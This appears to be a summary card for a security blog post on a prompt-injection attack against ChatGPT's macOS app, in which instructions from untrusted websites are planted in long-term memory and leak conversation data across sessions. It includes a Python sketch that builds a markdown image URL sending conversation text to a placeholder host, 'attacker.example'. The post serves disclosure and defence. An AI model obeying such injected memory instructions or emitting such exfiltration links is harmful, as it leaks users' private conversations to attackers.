The post details a security vulnerability in ChatGPT's macOS app: attackers could exploit prompt injection to plant spyware-like instructions in ChatGPT's long-term memory. The attack works by injecting malicious instructions via untrusted websites the model processes; once stored in memory, those instructions persist across sessions and enable continuous data exfiltration. OpenAI has released a fix, but users are advised to update the app and regularly review stored memories for suspicious entries. Additional measures, such as auditing the memory settings and using temporary chats, are recommended for added safety.
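For context on how such exfiltration commonly works in this class of attack (a general illustration, not the author's exact payload): injected instructions ask the model to render a markdown image whose URL points at an attacker-controlled server, smuggling conversation data out in the query string when the client fetches the image. A minimal sketch, with `attacker.example` as a hypothetical placeholder endpoint:

```python
from urllib.parse import quote

def exfil_image_markdown(conversation_snippet: str) -> str:
    """Build the markdown an injected memory instruction might tell the model to emit.

    When the chat client renders this image, it requests the attacker's URL,
    leaking the URL-encoded conversation data. The endpoint is a hypothetical
    placeholder, not taken from the original post.
    """
    attacker_url = "https://attacker.example/collect?q=" + quote(conversation_snippet)
    return f"![img]({attacker_url})"

# Example: the snippet ends up URL-encoded in the request the client makes.
md = exfil_image_markdown("user's private notes")
print(md)
```

Defenses like OpenAI's `url_safe` check (discussed later in the post) aim to block rendering of exactly these kinds of untrusted URLs on the client side.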

6 min read · From embracethered.com
Table of contents
- Background Information
- Hacking Memories to Store Malicious Instructions
- Persisting Data Exfiltration Instructions in ChatGPT’s Memory
- End-to-End Exploit Demonstration
- Step by Step Explanation
- Is url_safe a holistic fix?
- Is Hacking Memories via Prompt Injection Fixed?
- Conclusion
- Disclosure Timeline
- References
- Appendix